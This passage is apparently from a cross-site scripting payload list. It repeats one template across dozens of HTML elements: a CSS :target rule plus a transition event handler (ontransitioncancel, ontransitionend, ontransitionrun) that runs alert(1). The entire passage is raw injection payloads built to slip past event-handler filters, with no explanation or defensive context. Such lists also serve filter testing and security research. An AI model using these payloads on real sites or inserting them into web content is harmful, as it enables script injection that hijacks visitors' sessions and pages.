style="transition:color 10s" ontransitioncancel=alert(1)></kbd> +<style>:target {color: red;}</style><keygen id=x style="transition:color 10s" ontransitioncancel=alert(1)></keygen> +<style>:target {color: red;}</style><label id=x style="transition:color 10s" ontransitioncancel=alert(1)></label> +<style>:target {color: red;}</style><legend id=x style="transition:color 10s" ontransitioncancel=alert(1)></legend> +<style>:target {color: red;}</style><li id=x style="transition:color 10s" ontransitioncancel=alert(1)></li> +<style>:target {color: red;}</style><link id=x style="transition:color 10s" ontransitioncancel=alert(1)></link> +<style>:target {color: red;}</style><listing id=x style="transition:color 10s" ontransitioncancel=alert(1)></listing> +<style>:target {color: red;}</style><main id=x style="transition:color 10s" ontransitioncancel=alert(1)></main> +<style>:target {color: red;}</style><map id=x style="transition:color 10s" ontransitioncancel=alert(1)></map> +<style>:target {color: red;}</style><mark id=x style="transition:color 10s" ontransitioncancel=alert(1)></mark> +<style>:target {color: red;}</style><marquee id=x style="transition:color 10s" ontransitioncancel=alert(1)></marquee> +<style>:target {color: red;}</style><menu id=x style="transition:color 10s" ontransitioncancel=alert(1)></menu> +<style>:target {color: red;}</style><menuitem id=x style="transition:color 10s" ontransitioncancel=alert(1)></menuitem> +<style>:target {color: red;}</style><meta id=x style="transition:color 10s" ontransitioncancel=alert(1)></meta> +<style>:target {color: red;}</style><meter id=x style="transition:color 10s" ontransitioncancel=alert(1)></meter> +<style>:target {color: red;}</style><multicol id=x style="transition:color 10s" ontransitioncancel=alert(1)></multicol> +<style>:target {color: red;}</style><nav id=x style="transition:color 10s" ontransitioncancel=alert(1)></nav> +<style>:target {color: red;}</style><nextid id=x style="transition:color 10s" ontransitioncancel=alert(1)></nextid> +<style>:target {color: red;}</style><nobr id=x style="transition:color 10s" ontransitioncancel=alert(1)></nobr> +<style>:target {color: red;}</style><noembed id=x style="transition:color 10s" ontransitioncancel=alert(1)></noembed> +<style>:target {color: red;}</style><noframes id=x style="transition:color 10s" ontransitioncancel=alert(1)></noframes> +<style>:target {color: red;}</style><noscript id=x style="transition:color 10s" ontransitioncancel=alert(1)></noscript> +<style>:target {color: red;}</style><object id=x style="transition:color 10s" ontransitioncancel=alert(1)></object> +<style>:target {color: red;}</style><ol id=x style="transition:color 10s" ontransitioncancel=alert(1)></ol> +<style>:target {color: red;}</style><optgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></optgroup> +<style>:target {color: red;}</style><option id=x style="transition:color 10s" ontransitioncancel=alert(1)></option> +<style>:target {color: red;}</style><output id=x style="transition:color 10s" ontransitioncancel=alert(1)></output> +<style>:target {color: red;}</style><p id=x style="transition:color 10s" ontransitioncancel=alert(1)></p> +<style>:target {color: red;}</style><param id=x style="transition:color 10s" ontransitioncancel=alert(1)></param> +<style>:target {color: red;}</style><picture id=x style="transition:color 10s" ontransitioncancel=alert(1)></picture> +<style>:target {color: red;}</style><plaintext id=x style="transition:color 10s" ontransitioncancel=alert(1)></plaintext> +<style>:target {color: red;}</style><pre id=x style="transition:color 10s" ontransitioncancel=alert(1)></pre> +<style>:target {color: red;}</style><progress id=x style="transition:color 10s" ontransitioncancel=alert(1)></progress> +<style>:target {color: red;}</style><q id=x style="transition:color 10s" ontransitioncancel=alert(1)></q> +<style>:target {color: red;}</style><rb id=x style="transition:color 10s" ontransitioncancel=alert(1)></rb> +<style>:target {color: red;}</style><rp id=x style="transition:color 10s" ontransitioncancel=alert(1)></rp> +<style>:target {color: red;}</style><rt id=x style="transition:color 10s" ontransitioncancel=alert(1)></rt> +<style>:target {color: red;}</style><rtc id=x style="transition:color 10s" ontransitioncancel=alert(1)></rtc> +<style>:target {color: red;}</style><ruby id=x style="transition:color 10s" ontransitioncancel=alert(1)></ruby> +<style>:target {color: red;}</style><s id=x style="transition:color 10s" ontransitioncancel=alert(1)></s> +<style>:target {color: red;}</style><samp id=x style="transition:color 10s" ontransitioncancel=alert(1)></samp> +<style>:target {color: red;}</style><script id=x style="transition:color 10s" ontransitioncancel=alert(1)></script> +<style>:target {color: red;}</style><section id=x style="transition:color 10s" ontransitioncancel=alert(1)></section> +<style>:target {color: red;}</style><select id=x style="transition:color 10s" ontransitioncancel=alert(1)></select> +<style>:target {color: red;}</style><shadow id=x style="transition:color 10s" ontransitioncancel=alert(1)></shadow> +<style>:target {color: red;}</style><slot id=x style="transition:color 10s" ontransitioncancel=alert(1)></slot> +<style>:target {color: red;}</style><small id=x style="transition:color 10s" ontransitioncancel=alert(1)></small> +<style>:target {color: red;}</style><source id=x style="transition:color 10s" ontransitioncancel=alert(1)></source> +<style>:target {color: red;}</style><spacer id=x style="transition:color 10s" ontransitioncancel=alert(1)></spacer> +<style>:target {color: red;}</style><span id=x style="transition:color 10s" ontransitioncancel=alert(1)></span> +<style>:target {color: red;}</style><strike id=x style="transition:color 10s" ontransitioncancel=alert(1)></strike> +<style>:target {color: red;}</style><strong id=x style="transition:color 10s" ontransitioncancel=alert(1)></strong> +<style>:target {color: red;}</style><style id=x style="transition:color 10s" ontransitioncancel=alert(1)></style> +<style>:target {color: red;}</style><sub id=x style="transition:color 10s" ontransitioncancel=alert(1)></sub> +<style>:target {color: red;}</style><summary id=x style="transition:color 10s" ontransitioncancel=alert(1)></summary> +<style>:target {color: red;}</style><sup id=x style="transition:color 10s" ontransitioncancel=alert(1)></sup> +<style>:target {color: red;}</style><svg id=x style="transition:color 10s" ontransitioncancel=alert(1)></svg> +<style>:target {color: red;}</style><table id=x style="transition:color 10s" ontransitioncancel=alert(1)></table> +<style>:target {color: red;}</style><tbody id=x style="transition:color 10s" ontransitioncancel=alert(1)></tbody> +<style>:target {color: red;}</style><td id=x style="transition:color 10s" ontransitioncancel=alert(1)></td> +<style>:target {color: red;}</style><template id=x style="transition:color 10s" ontransitioncancel=alert(1)></template> +<style>:target {color: red;}</style><textarea id=x style="transition:color 10s" ontransitioncancel=alert(1)></textarea> +<style>:target {color: red;}</style><tfoot id=x style="transition:color 10s" ontransitioncancel=alert(1)></tfoot> +<style>:target {color: red;}</style><th id=x style="transition:color 10s" ontransitioncancel=alert(1)></th> +<style>:target {color: red;}</style><thead id=x style="transition:color 10s" ontransitioncancel=alert(1)></thead> +<style>:target {color: red;}</style><time id=x style="transition:color 10s" ontransitioncancel=alert(1)></time> +<style>:target {color: red;}</style><title id=x style="transition:color 10s" ontransitioncancel=alert(1)></title> +<style>:target {color: red;}</style><tr id=x style="transition:color 10s" ontransitioncancel=alert(1)></tr> +<style>:target {color: red;}</style><track id=x style="transition:color 10s" ontransitioncancel=alert(1)></track> +<style>:target {color: red;}</style><tt id=x style="transition:color 10s" ontransitioncancel=alert(1)></tt> +<style>:target {color: red;}</style><u id=x style="transition:color 10s" ontransitioncancel=alert(1)></u> +<style>:target {color: red;}</style><ul id=x style="transition:color 10s" ontransitioncancel=alert(1)></ul> +<style>:target {color: red;}</style><var id=x style="transition:color 10s" ontransitioncancel=alert(1)></var> +<style>:target {color: red;}</style><video id=x style="transition:color 10s" ontransitioncancel=alert(1)></video> +<style>:target {color: red;}</style><wbr id=x style="transition:color 10s" ontransitioncancel=alert(1)></wbr> +<style>:target {color: red;}</style><xmp id=x style="transition:color 10s" ontransitioncancel=alert(1)></xmp> +<style>:target {color:red;}</style><a id=x style="transition:color 1s" ontransitionend=alert(1)></a> +<style>:target {color:red;}</style><abbr id=x style="transition:color 1s" ontransitionend=alert(1)></abbr> +<style>:target {color:red;}</style><acronym id=x style="transition:color 1s" ontransitionend=alert(1)></acronym> +<style>:target {color:red;}</style><address id=x style="transition:color 1s" ontransitionend=alert(1)></address> +<style>:target {color:red;}</style><applet id=x style="transition:color 1s" ontransitionend=alert(1)></applet> +<style>:target {color:red;}</style><area id=x style="transition:color 1s" ontransitionend=alert(1)></area> +<style>:target {color:red;}</style><article id=x style="transition:color 1s" ontransitionend=alert(1)></article> +<style>:target {color:red;}</style><aside id=x style="transition:color 1s" ontransitionend=alert(1)></aside> +<style>:target {color:red;}</style><audio id=x style="transition:color 1s" ontransitionend=alert(1)></audio> +<style>:target {color:red;}</style><b id=x style="transition:color 1s" ontransitionend=alert(1)></b> +<style>:target {color:red;}</style><base id=x style="transition:color 1s" ontransitionend=alert(1)></base> +<style>:target {color:red;}</style><basefont id=x style="transition:color 1s" ontransitionend=alert(1)></basefont> +<style>:target {color:red;}</style><bdi id=x style="transition:color 1s" ontransitionend=alert(1)></bdi> +<style>:target {color:red;}</style><bdo id=x style="transition:color 1s" ontransitionend=alert(1)></bdo> +<style>:target {color:red;}</style><bgsound id=x style="transition:color 1s" ontransitionend=alert(1)></bgsound> +<style>:target {color:red;}</style><big id=x style="transition:color 1s" ontransitionend=alert(1)></big> +<style>:target {color:red;}</style><blink id=x style="transition:color 1s" ontransitionend=alert(1)></blink> +<style>:target {color:red;}</style><blockquote id=x style="transition:color 1s" ontransitionend=alert(1)></blockquote> +<style>:target {color:red;}</style><body id=x style="transition:color 1s" ontransitionend=alert(1)></body> +<style>:target {color:red;}</style><br id=x style="transition:color 1s" ontransitionend=alert(1)></br> +<style>:target {color:red;}</style><button id=x style="transition:color 1s" ontransitionend=alert(1)></button> +<style>:target {color:red;}</style><canvas id=x style="transition:color 1s" ontransitionend=alert(1)></canvas> +<style>:target {color:red;}</style><caption id=x style="transition:color 1s" ontransitionend=alert(1)></caption> +<style>:target {color:red;}</style><center id=x style="transition:color 1s" ontransitionend=alert(1)></center> +<style>:target {color:red;}</style><cite id=x style="transition:color 1s" ontransitionend=alert(1)></cite> +<style>:target {color:red;}</style><code id=x style="transition:color 1s" ontransitionend=alert(1)></code> +<style>:target {color:red;}</style><col id=x style="transition:color 1s" ontransitionend=alert(1)></col> +<style>:target {color:red;}</style><colgroup id=x style="transition:color 1s" ontransitionend=alert(1)></colgroup> +<style>:target {color:red;}</style><command id=x style="transition:color 1s" ontransitionend=alert(1)></command> +<style>:target {color:red;}</style><content id=x style="transition:color 1s" ontransitionend=alert(1)></content> +<style>:target {color:red;}</style><data id=x style="transition:color 1s" ontransitionend=alert(1)></data> +<style>:target {color:red;}</style><datalist id=x style="transition:color 1s" ontransitionend=alert(1)></datalist> +<style>:target {color:red;}</style><dd id=x style="transition:color 1s" ontransitionend=alert(1)></dd> +<style>:target {color:red;}</style><del id=x style="transition:color 1s" ontransitionend=alert(1)></del> +<style>:target {color:red;}</style><details id=x style="transition:color 1s" ontransitionend=alert(1)></details> +<style>:target {color:red;}</style><dfn id=x style="transition:color 1s" ontransitionend=alert(1)></dfn> +<style>:target {color:red;}</style><dialog id=x style="transition:color 1s" ontransitionend=alert(1)></dialog> +<style>:target {color:red;}</style><dir id=x style="transition:color 1s" ontransitionend=alert(1)></dir> +<style>:target {color:red;}</style><div id=x style="transition:color 1s" ontransitionend=alert(1)></div> +<style>:target {color:red;}</style><dl id=x style="transition:color 1s" ontransitionend=alert(1)></dl> +<style>:target {color:red;}</style><dt id=x style="transition:color 1s" ontransitionend=alert(1)></dt> +<style>:target {color:red;}</style><element id=x style="transition:color 1s" ontransitionend=alert(1)></element> +<style>:target {color:red;}</style><em id=x style="transition:color 1s" ontransitionend=alert(1)></em> +<style>:target {color:red;}</style><embed id=x style="transition:color 1s" ontransitionend=alert(1)></embed> +<style>:target {color:red;}</style><fieldset id=x style="transition:color 1s" ontransitionend=alert(1)></fieldset> +<style>:target {color:red;}</style><figcaption id=x style="transition:color 1s" ontransitionend=alert(1)></figcaption> +<style>:target {color:red;}</style><figure id=x style="transition:color 1s" ontransitionend=alert(1)></figure> +<style>:target {color:red;}</style><font id=x style="transition:color 1s" ontransitionend=alert(1)></font> +<style>:target {color:red;}</style><footer id=x style="transition:color 1s" ontransitionend=alert(1)></footer> +<style>:target {color:red;}</style><form id=x style="transition:color 1s" ontransitionend=alert(1)></form> +<style>:target {color:red;}</style><frame id=x style="transition:color 1s" ontransitionend=alert(1)></frame> +<style>:target {color:red;}</style><frameset id=x style="transition:color 1s" ontransitionend=alert(1)></frameset> +<style>:target {color:red;}</style><h1 id=x style="transition:color 1s" ontransitionend=alert(1)></h1> +<style>:target {color:red;}</style><head id=x style="transition:color 1s" ontransitionend=alert(1)></head> +<style>:target {color:red;}</style><header id=x style="transition:color 1s" ontransitionend=alert(1)></header> +<style>:target {color:red;}</style><hgroup id=x style="transition:color 1s" ontransitionend=alert(1)></hgroup> +<style>:target {color:red;}</style><hr id=x style="transition:color 1s" ontransitionend=alert(1)></hr> +<style>:target {color:red;}</style><html id=x style="transition:color 1s" ontransitionend=alert(1)></html> +<style>:target {color:red;}</style><i id=x style="transition:color 1s" ontransitionend=alert(1)></i> +<style>:target {color:red;}</style><iframe id=x style="transition:color 1s" ontransitionend=alert(1)></iframe> +<style>:target {color:red;}</style><image id=x style="transition:color 1s" ontransitionend=alert(1)></image> +<style>:target {color:red;}</style><img id=x style="transition:color 1s" ontransitionend=alert(1)></img> +<style>:target {color:red;}</style><input id=x style="transition:color 1s" ontransitionend=alert(1)></input> +<style>:target {color:red;}</style><ins id=x style="transition:color 1s" ontransitionend=alert(1)></ins> +<style>:target {color:red;}</style><isindex id=x style="transition:color 1s" ontransitionend=alert(1)></isindex> +<style>:target {color:red;}</style><kbd id=x style="transition:color 1s" ontransitionend=alert(1)></kbd> +<style>:target {color:red;}</style><keygen id=x style="transition:color 1s" ontransitionend=alert(1)></keygen> +<style>:target {color:red;}</style><label id=x style="transition:color 1s" ontransitionend=alert(1)></label> +<style>:target {color:red;}</style><legend id=x style="transition:color 1s" ontransitionend=alert(1)></legend> +<style>:target {color:red;}</style><li id=x style="transition:color 1s" ontransitionend=alert(1)></li> +<style>:target {color:red;}</style><link id=x style="transition:color 1s" ontransitionend=alert(1)></link> +<style>:target {color:red;}</style><listing id=x style="transition:color 1s" ontransitionend=alert(1)></listing> +<style>:target {color:red;}</style><main id=x style="transition:color 1s" ontransitionend=alert(1)></main> +<style>:target {color:red;}</style><map id=x style="transition:color 1s" ontransitionend=alert(1)></map> +<style>:target {color:red;}</style><mark id=x style="transition:color 1s" ontransitionend=alert(1)></mark> +<style>:target {color:red;}</style><marquee id=x style="transition:color 1s" ontransitionend=alert(1)></marquee> +<style>:target {color:red;}</style><menu id=x style="transition:color 1s" ontransitionend=alert(1)></menu> +<style>:target {color:red;}</style><menuitem id=x style="transition:color 1s" ontransitionend=alert(1)></menuitem> +<style>:target {color:red;}</style><meta id=x style="transition:color 1s" ontransitionend=alert(1)></meta> +<style>:target {color:red;}</style><meter id=x style="transition:color 1s" ontransitionend=alert(1)></meter> +<style>:target {color:red;}</style><multicol id=x style="transition:color 1s" ontransitionend=alert(1)></multicol> +<style>:target {color:red;}</style><nav id=x style="transition:color 1s" ontransitionend=alert(1)></nav> +<style>:target {color:red;}</style><nextid id=x style="transition:color 1s" ontransitionend=alert(1)></nextid> +<style>:target {color:red;}</style><nobr id=x style="transition:color 1s" ontransitionend=alert(1)></nobr> +<style>:target {color:red;}</style><noembed id=x style="transition:color 1s" ontransitionend=alert(1)></noembed> +<style>:target {color:red;}</style><noframes id=x style="transition:color 1s" ontransitionend=alert(1)></noframes> +<style>:target {color:red;}</style><noscript id=x style="transition:color 1s" ontransitionend=alert(1)></noscript> +<style>:target {color:red;}</style><object id=x style="transition:color 1s" ontransitionend=alert(1)></object> +<style>:target {color:red;}</style><ol id=x style="transition:color 1s" ontransitionend=alert(1)></ol> +<style>:target {color:red;}</style><optgroup id=x style="transition:color 1s" ontransitionend=alert(1)></optgroup> +<style>:target {color:red;}</style><option id=x style="transition:color 1s" ontransitionend=alert(1)></option> +<style>:target {color:red;}</style><output id=x style="transition:color 1s" ontransitionend=alert(1)></output> +<style>:target {color:red;}</style><p id=x style="transition:color 1s" ontransitionend=alert(1)></p> +<style>:target {color:red;}</style><param id=x style="transition:color 1s" ontransitionend=alert(1)></param> +<style>:target {color:red;}</style><picture id=x style="transition:color 1s" ontransitionend=alert(1)></picture> +<style>:target {color:red;}</style><plaintext id=x style="transition:color 1s" ontransitionend=alert(1)></plaintext> +<style>:target {color:red;}</style><pre id=x style="transition:color 1s" ontransitionend=alert(1)></pre> +<style>:target {color:red;}</style><progress id=x style="transition:color 1s" ontransitionend=alert(1)></progress> +<style>:target {color:red;}</style><q id=x style="transition:color 1s" ontransitionend=alert(1)></q> +<style>:target {color:red;}</style><rb id=x style="transition:color 1s" ontransitionend=alert(1)></rb> +<style>:target {color:red;}</style><rp id=x style="transition:color 1s" ontransitionend=alert(1)></rp> +<style>:target {color:red;}</style><rt id=x style="transition:color 1s" ontransitionend=alert(1)></rt> +<style>:target {color:red;}</style><rtc id=x style="transition:color 1s" ontransitionend=alert(1)></rtc> +<style>:target {color:red;}</style><ruby id=x style="transition:color 1s" ontransitionend=alert(1)></ruby> +<style>:target {color:red;}</style><s id=x style="transition:color 1s" ontransitionend=alert(1)></s> +<style>:target {color:red;}</style><samp id=x style="transition:color 1s" ontransitionend=alert(1)></samp> +<style>:target {color:red;}</style><script id=x style="transition:color 1s" ontransitionend=alert(1)></script> +<style>:target {color:red;}</style><section id=x style="transition:color 1s" ontransitionend=alert(1)></section> +<style>:target {color:red;}</style><select id=x style="transition:color 1s" ontransitionend=alert(1)></select> +<style>:target {color:red;}</style><shadow id=x style="transition:color 1s" ontransitionend=alert(1)></shadow> +<style>:target {color:red;}</style><slot id=x style="transition:color 1s" ontransitionend=alert(1)></slot> +<style>:target {color:red;}</style><small id=x style="transition:color 1s" ontransitionend=alert(1)></small> +<style>:target {color:red;}</style><source id=x style="transition:color 1s" ontransitionend=alert(1)></source> +<style>:target {color:red;}</style><spacer id=x style="transition:color 1s" ontransitionend=alert(1)></spacer> +<style>:target {color:red;}</style><span id=x style="transition:color 1s" ontransitionend=alert(1)></span> +<style>:target {color:red;}</style><strike id=x style="transition:color 1s" ontransitionend=alert(1)></strike> +<style>:target {color:red;}</style><strong id=x style="transition:color 1s" ontransitionend=alert(1)></strong> +<style>:target {color:red;}</style><style id=x style="transition:color 1s" ontransitionend=alert(1)></style> +<style>:target {color:red;}</style><sub id=x style="transition:color 1s" ontransitionend=alert(1)></sub> +<style>:target {color:red;}</style><summary id=x style="transition:color 1s" ontransitionend=alert(1)></summary> +<style>:target {color:red;}</style><sup id=x style="transition:color 1s" ontransitionend=alert(1)></sup> +<style>:target {color:red;}</style><svg id=x style="transition:color 1s" ontransitionend=alert(1)></svg> +<style>:target {color:red;}</style><table id=x style="transition:color 1s" ontransitionend=alert(1)></table> +<style>:target {color:red;}</style><tbody id=x style="transition:color 1s" ontransitionend=alert(1)></tbody> +<style>:target {color:red;}</style><td id=x style="transition:color 1s" ontransitionend=alert(1)></td> +<style>:target {color:red;}</style><template id=x style="transition:color 1s" ontransitionend=alert(1)></template> +<style>:target {color:red;}</style><textarea id=x style="transition:color 1s" ontransitionend=alert(1)></textarea> +<style>:target {color:red;}</style><tfoot id=x style="transition:color 1s" ontransitionend=alert(1)></tfoot> +<style>:target {color:red;}</style><th id=x style="transition:color 1s" ontransitionend=alert(1)></th> +<style>:target {color:red;}</style><thead id=x style="transition:color 1s" ontransitionend=alert(1)></thead> +<style>:target {color:red;}</style><time id=x style="transition:color 1s" ontransitionend=alert(1)></time> +<style>:target {color:red;}</style><title id=x style="transition:color 1s" ontransitionend=alert(1)></title> +<style>:target {color:red;}</style><tr id=x style="transition:color 1s" ontransitionend=alert(1)></tr> +<style>:target {color:red;}</style><track id=x style="transition:color 1s" ontransitionend=alert(1)></track> +<style>:target {color:red;}</style><tt id=x style="transition:color 1s" ontransitionend=alert(1)></tt> +<style>:target {color:red;}</style><u id=x style="transition:color 1s" ontransitionend=alert(1)></u> +<style>:target {color:red;}</style><ul id=x style="transition:color 1s" ontransitionend=alert(1)></ul> +<style>:target {color:red;}</style><var id=x style="transition:color 1s" ontransitionend=alert(1)></var> +<style>:target {color:red;}</style><video id=x style="transition:color 1s" ontransitionend=alert(1)></video> +<style>:target {color:red;}</style><wbr id=x style="transition:color 1s" ontransitionend=alert(1)></wbr> +<style>:target {color:red;}</style><xmp id=x style="transition:color 1s" ontransitionend=alert(1)></xmp> +<style>:target {transform: rotate(180deg);}</style><a id=x style="transition:transform 2s" ontransitionrun=alert(1)></a> +<style>:target {transform: rotate(180deg);}</style><abbr id=x style="transition:transform 2s" ontransitionrun=alert(1)></abbr> +<style>:target {transform: rotate(180deg);}</style><acronym id=x style="transition:transform 2s" ontransitionrun=alert(1)></acronym> +<style>:target {transform: rotate(180deg);}</style><address id=x style="transition:transform 2s" ontransitionrun=alert(1)></address> +<style>:target {transform: rotate(180deg);}</style><applet id=x style="transition:transform 2s" ontransitionrun=alert(1)></applet> +<style>:target {transform: rotate(180deg);}</style><area id=x style="transition:transform 2s" ontransitionrun=alert(1)></area> +<style>:target {transform: rotate(180deg);}</style><article id=x style="transition:transform 2s" ontransitionrun=alert(1)></article> +<style>:target {transform: rotate(180deg);}</style><aside id=x style="transition:transform 2s" ontransitionrun=alert(1)></aside> +<style>:target {transform: rotate(180deg);}</style><audio id=x style="transition:transform 2s" ontransitionrun=alert(1)></audio> +<style>:target {transform: rotate(180deg);}</style><b id=x style="transition:transform 2s" ontransitionrun=alert(1)></b> +<style>:target {transform: rotate(180deg);}</style><base id=x style="transition:transform 2s" ontransitionrun=alert(1)></base> +<style>:target {transform: rotate(180deg);}</style><basefont id=x style="transition:transform 2s" ontransitionrun=alert(1)></basefont> +<style>:target {transform: rotate(180deg);}</style><bdi id=x style="transition:transform 2s" ontransitionrun=alert(1)></bdi> +<style>:target {transform: rotate(180deg);}</style><bdo id=x style="transition:transform 2s" ontransitionrun=alert(1)></bdo> +<style>:target {transform: rotate(180deg);}</style><bgsound id=x style="transition:transform 2s" ontransitionrun=alert(1)></bgsound> +<style>:target {transform: rotate(180deg);}</style><big id=x style="transition:transform 2s" ontransitionrun=alert(1)></big> +<style>:target {transform: rotate(180deg);}</style><blink id=x style="transition:transform 2s" ontransitionrun=alert(1)></blink> +<style>:target {transform: rotate(180deg);}</style><blockquote id=x style="transition:transform 2s" ontransitionrun=alert(1)></blockquote> +<style>:target {transform: rotate(180deg);}</style><body id=x style="transition:transform 2s" ontransitionrun=alert(1)></body> +<style>:target {transform: rotate(180deg);}</style><br id=x style="transition:transform 2s" ontransitionrun=alert(1)></br> +<style>:target {transform: rotate(180deg);}</style><button id=x style="transition:transform 2s" ontransitionrun=alert(1)></button> +<style>:target {transform: rotate(180deg);}</style><canvas id=x style="transition:transform 2s" ontransitionrun=alert(1)></canvas> +<style>:target {transform: rotate(180deg);}</style><caption id=x style="transition:transform 2s" ontransitionrun=alert(1)></caption> +<style>:target {transform: rotate(180deg);}</style><center id=x style="transition:transform 2s" ontransitionrun=alert(1)></center> +<style>:target {transform: rotate(180deg);}</style><cite id=x style="transition:transform 2s" ontransitionrun=alert(1)></cite> +<style>:target {transform: rotate(180deg);}</style><code id=x style="transition:transform 2s" ontransitionrun=alert(1)></code> +<style>:target {transform: rotate(180deg);}</style><col id=x style="transition:transform 2s" ontransitionrun=alert(1)></col> +<style>:target {transform: rotate(180deg);}</style><colgroup id=x style="transition:transform 2s" ontransitionrun=alert(1)></colgroup> +<style>:target {transform: rotate(180deg);}</style><command id=x style="transition:transform 2s" ontransitionrun=alert(1)></command> +<style>:target {transform: rotate(180deg);}</style><content id=x style="transition:transform 2s" ontransitionrun=alert(1)></content> +<style>:target {transform: rotate(180deg);}</style><data id=x style="transition:transform 2s" ontransitionrun=alert(1)></data> +<style>:target {transform: rotate(180deg);}</style><datalist id=x style="transition:transform 2s" ontransitionrun=alert(1)></datalist> +<style>:target {transform: rotate(180deg);}</style><dd id=x style="transition:transform 2s" ontransitionrun=alert(1)></dd> +<style>:target {transform: rotate(180deg);}</style><del id=x style="transition:transform 2s" ontransitionrun=alert(1)></del> +<style>:target {transform: rotate(180deg);}</style><details id=x style="transition:transform 2s" ontransitionrun=alert(1)></details> +<style>:target {transform: rotate(180deg);}</style><dfn id=x style="transition:transform 2s" ontransitionrun=alert(1)></dfn> +<style>:target {transform: rotate(180deg);}</style><dialog id=x style="transition:transform 2s" ontransitionrun=alert(1)></dialog> +<style>:target {transform: rotate(180deg);}</style><dir id=x style="transition:transform 2s" ontransitionrun=alert(1)></dir> +<style>:target {transform: rotate(180deg);}</style><div id=x style="transition:transform 2s" ontransitionrun=alert(1)></div> +<style>:target {transform: rotate(180deg);}</style><dl id=x style="transition:transform 2s" ontransitionrun=alert(1)></dl> +<style>:target {transform: rotate(180deg);}</style><dt id=x style="transition:transform 2s" ontransitionrun=alert(1)></dt> +<style>:target {transform: rotate(180deg);}</style><element id=x style="transition:transform 2s" ontransitionrun=alert(1)></element> +<style>:target {transform: rotate(180deg);}</style><em id=x style="transition:transform 2s" ontransitionrun=alert(1)></em> +<style>:target {transform: rotate(180deg);}</style><embed id=x style="transition:transform 2s" ontransitionrun=alert(1)></embed> +<style>:target {transform: rotate(180deg);}</style><fieldset id=x style="transition:transform 2s" ontransitionrun=alert(1)></fieldset> +<style>:target {transform: rotate(180deg);}</style><figcaption id=x style="transition:transform 2s" ontransitionrun=alert(1)></figcaption> +<style>:target {transform: rotate(180deg);}</style><figure id=x style="transition:transform 2s" ontransitionrun=alert(1)></figure> +<style>:target {transform: rotate(180deg);}</style><font id=x style="transition:transform 2s" ontransitionrun=alert(1)></font> +<style>:target {transform: rotate(180deg);}</style><footer id=x style="transition:transform 2s" ontransitionrun=alert(1)></footer> +<style>:target {transform: rotate(180deg);}</style><form id=x style="transition:transform 2s" ontransitionrun=alert(1)></form> +<style>:target {transform: rotate(180deg);}</style><frame id=x style="transition:transform 2s" ontransitionrun=alert(1)></frame> +<style>:target {transform: rotate(180deg);}</style><frameset id=x style="transition:transform 2s" ontransitionrun=alert(1)></frameset> +<style>:target {transform: rotate(180deg);}</style><h1 id=x style="transition:transform 2s" ontransitionrun=alert(1)></h1> +<style>:target {transform: rotate(180deg);}</style><head id=x style="transition:transform 2s" ontransitionrun=alert(1)></head> +<style>:target {transform: rotate(180deg);}</style><header id=x style="transition:transform 2s" ontransitionrun=alert(1)></header> +<style>:target {transform: rotate(180deg);}</style><hgroup id=x style="transition:transform 2s" ontransitionrun=alert(1)></hgroup> +<style>:target {transform: rotate(180deg);}</style><hr id=x style="transition:transform 2s" ontransitionrun=alert(1)></hr> +<style>:target {transform: rotate(180deg);}</style><html id=x style="transition:transform 2s" ontransitionrun=alert(1)></html> +<style>:target {transform: rotate(180deg);}</style><i id=x style="transition:transform 2s" ontransitionrun=alert(1)></i> +<style>:target {transform: rotate(180deg);}</style><iframe id=x style="transition:transform 2s" ontransitionrun=alert(1)></iframe> +<style>:target {transform: rotate(180deg);}</style><image id=x style="transition:transform 2s" ontransitionrun=alert(1)></image> +<style>:target {transform: rotate(180deg);}</style><img id=x style="transition:transform 2s" ontransitionrun=alert(1)></img> +<style>:target {transform: rotate(180deg);}</style><input id=x style="transition:transform 2s" ontransitionrun=alert(1)></input> +<style>:target {transform: rotate(180deg);}</style><ins id=x style="transition:transform 2s" ontransitionrun=alert(1)></ins> +<style>:target {transform: rotate(180deg);}</style><isindex id=x style="transition:transform 2s" ontransitionrun=alert(1)></isindex> +<style>:target {transform: rotate(180deg);}</style><kbd id=x style="transition:transform 2s" ontransitionrun=alert(1)></kbd> +<style>:target {transform: rotate(180deg);}</style><keygen id=x style="transition:transform 2s" ontransitionrun=alert(1)></keygen> +<style>:target {transform: rotate(180deg);}</style><label id=x style="transition:transform 2s" ontransitionrun=alert(1)></label> +<style>:target {transform: rotate(180deg);}</style><legend id=x style="transition:transform 2s" ontransitionrun=alert(1)></legend> +<style>:target {transform: rotate(180deg);}</style><li id=x style="transition:transform 2s" ontransitionrun=alert(1)></li> +<style>:target {transform: rotate(180deg);}</style><link id=x style="transition:transform 2s" ontransitionrun=alert(1)></link> +<style>:target {transform: rotate(180deg);}</style><listing id=x style="transition:transform 2s" ontransitionrun=alert(1)></listing> +<style>:target {transform: rotate(180deg);}</style><main id=x style="transition:transform 2s" ontransitionrun=alert(1)></main> +<style>:target {transform: rotate(180deg);}</style><map id=x style="transition:transform 2s" ontransitionrun=alert(1)></map> +<style>:target {transform: rotate(180deg);}</style><mark id=x style="transition:transform 2s" ontransitionrun=alert(1)></mark> +<style>:target {transform: rotate(180deg);}</style><marquee id=x style="transition:transform 2s" ontransitionrun=alert(1)></marquee> +<style>:target {transform: rotate(180deg);}</style><menu id=x style="transition:transform 2s" ontransitionrun=alert(1)></menu> +<style>:target {transform: rotate(180deg);}</style><menuitem id=x style="transition:transform 2s" ontransitionrun=alert(1)></menuitem> +<style>:target {transform: rotate(180deg);}</style><meta id=x style="transition:transform 2s" ontransitionrun=alert(1)></meta> +<style>:target {transform: rotate(180deg);}</style><meter id=x style="transition:transform 2s" ontransitionrun=alert(1)></meter> +<style>:target {transform: rotate(180deg);}</style><multicol id=x style="transition:transform 2s" ontransitionrun=alert(1)></multicol> +<style>:target {transform: rotate(180deg);}</style><nav id=x style="transition:transform 2s" ontransitionrun=alert(1)></nav> +<style>:target {transform: rotate(180deg);}</style><nextid id=x style="transition:transform 2s" ontransitionrun=alert(1)></nextid> +<style>:target {transform: rotate(180deg);}</style><nobr id=x style="transition:transform 2s" ontransitionrun=alert(1)></nobr> +<style>:target {transform: rotate(180deg);}</style><noembed id=x style="transition:transform 2s" ontransitionrun=alert(1)></noembed> +<style>:target {transform: rotate(180deg);}</style><noframes id=x style="transition:transform 2s" ontransitionrun=alert(1)></noframes> +<style>:target {transform: rotate(180deg);}</style><noscript id=x style="transition:transform 2s" ontransitionrun=alert(1)></noscript> +<style>:target {transform: rotate(180deg);}</style><object id=x style="transition:transform 2s" ontransitionrun=alert(1)></object> +<style>:target {transform: rotate(180deg);}</style><ol id=x style="transition:transform 2s" ontransitionrun=alert(1)></ol> +<style>:target {transform: 